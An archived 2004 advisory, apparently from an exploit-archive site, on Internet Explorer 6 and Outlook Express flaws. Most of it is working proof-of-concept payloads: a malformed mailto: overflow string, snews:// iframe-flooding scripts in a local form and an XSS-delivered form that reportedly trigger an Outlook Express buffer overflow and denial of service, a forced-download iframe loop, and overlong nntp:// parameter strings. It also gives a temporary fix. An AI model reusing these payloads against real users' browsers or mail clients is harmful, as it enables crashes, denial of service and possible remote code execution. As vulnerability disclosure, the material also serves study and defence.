exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IEmultiples.txt

IEmultiples.txt
Posted Jan 21, 2004
Authored by Rafel Ivgi | Site theinsider.deep-ice.com

When using the SNEWS protocol, Internet Explorer lacks its filtering engine and can trigger Outlook Express to be hit by a buffer overrun resulting in possible code execution.

tags | advisory, overflow, code execution, protocol
SHA-256 | b1c8758f7ae810befb59be9d3679bb31b88d48ffc8d5d5c14e2ef342f8769de7

IEmultiples.txt

Change Mirror Download
Internet Explorer - Multiple Vulnerabilities

Discovered by Rafel Ivgi, The-Insider.
http://theinsider.deep-ice.com

Every time i Read about a Vulnerability concerning I.E i believe more
and more and I.E is the biggest backdoor ever.
After the CONTENT-TYPE: bug that allowed to download exe's as audio's
and all the patches, I.E 6 still has parsing problems. I discovered
that amazingly with another wonderful microsoft software, i can
force downloads on users, fake downloaded file extentions and names,
inject scripts to the "blank" file, run a lot of different applications,
cause a lot of errors and see the content of binary files inside I.E,
cause a buffer overflow in outlook and even D.O.S the system.
Before you read the following text i believe the most dangerous bug in I.E
is the possibility
of actively creating <iframes> or poping up new windows *without a
limit*(only memory limit). This makes it easy
to create many errors, overflows , and to D.O.S internet users.

****************************************************************************
*********************************
Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)

Microsoft has inserted a filtering engine inside Internet Explorer. This
engine verifies that
only secure,valid and appropriate(in syntax) data will be passed on to
external applications.
**************************************************
The filtering engine skips a few important checks such as the "MAILTO:"
protocol. With no filtering
it allows inappropriate data to be sent to the default mail client.

Example:
mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99
%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%9
8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%9
9%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00
%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%0
0%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%
C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%
99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01
%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2
%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%00%00%00%00%a5%e2%99%a6%e2%99%a3%e
2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
00%00%00%00%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98

which pops up the following error message : "The default mail client is not
properly installed".
There should be filtering because there can't be such email address such as
this:(which is accepted by the I.E plugins filter)

mailto:%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%
01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%
98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5
%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaa
aa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%
e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C
8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e
2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaa
aaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a
6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5
%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%a5%e2%99%a6%e2%99%a3
%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a%a5%e2%99%a6%e2%99%a3%e2%98aaaaaaaaaa%C7%C5%C8%01%98aaaaaaaaaaaaaaaaaaaaaa%
a5%e2%99%a6%e2%99%a3aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa
**************************************************

This filtering engine also filters outlook links such as the NNTP & SNTP
protocols. However
the security hole appears when an attacker uses the SNEWS protocol, which
has no filterings.

nntp://aaaaaa.com/aaaaa - filtering active! - results an error message.
sntp://aaaaaaaaaaaaaaa - filtering active! - results an error message.
snews://aaaaaaaaaaaaa - filtering *inactive!* - results activation of
outlook and server injection into outlook.

This secuirty hole allows any html page/website to open outlook express and
inject anything
as if it was a valid news server. This can be a troubling issue if someone
will make a loop
that will inject a huge amount of fake snews servers, this address will
remain written in the outlook's
news servers database and may cause crash or waste of system resources.
The simplest way to exploit this vulnerability is by XSS(Cross Site
Scripting)

Local example - example.html :
-------------- Cut Here --------------
<script>
var i
for (i=1;i<1000000;i++) {
document.write("\<iframe
src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
"\"\>\<\/iframe>");
}
document.refresh;
</script>
-------------- Cut Here --------------

Or by XSS:

http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
document.write("\<iframe
src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i +
"\"\>\<\/iframe>"); } document.refresh; </script>

This issue also creates a Buffer Overflow within Outlook Express at offset
0x00dc735, which closes
outlook express, slows down the system and may even halt low memory
machines.
This buffer overflow in outlook express is HIGHLY DANGEROUS , it can cause
remote arbitary command executions on almost every XP machine on earth.

Temporary Fix For This Problem: The first time outlook is ran by the url
"snews://aaaaaaaaaaaa"
it asks the user if he would like outlook to be the default "SNEWS" client,
Choosing no will
solve the problem for now.
****************************************************************************
*********************************
Disable Backspace In I.E

*Manually Type* in I.E address bar "http://www.yourhost.com/#"
CLICK ENTER..
No backspace!

No special danger except abusing simple people.
****************************************************************************
*********************************

I.E automatically starts download box a file when the same file with a
".css" extention exists in that folder.
For example:
http://<host>/styles

This will cause an I.E download box that tries to download the file
"styles".
***This happends only because a file named "styles.css" is located in that
folder.***

Exploit Example - example2.html :
-------------- Cut Here --------------:
<script>
var i
for (i=1;i<1000;i++) {
document.write("\<iframe src=\"http://<host>/styles\"\>\<\/iframe>");
}
document.refresh;
</script>
-------------- Cut Here --------------:

This will execute frontpage and will start reffering the ".css" to it. For
each file download there
will open 2 message boxes, 1 is the download windows and 2 is the error
"cant find " message,
which reveals/enumerates the path of all local Temporary Internet Files
folders. This quick memory
overload will fill-up frontpage memory and afterwards it will open the
".css" files in "notepad". And
after its done with notepad memeory it will try opening files in "open
with", which is done by "rundll32.exe".
At this point "rundll32.exe" will reach a out of memory overflow and will
raise a message box for each
file download attempt.
****************************************************************************
*********************************
I.E Long Parameter Errors
nntp:///62.219.131.195/a=?b=?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafile://http://ftp://www.tripod.com
can be tested with all protocols nntp://,sntp://,ldap://,ftp://
****************************************************************************
*********************************

"Things that are unlikeable, are NOT impossible."
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close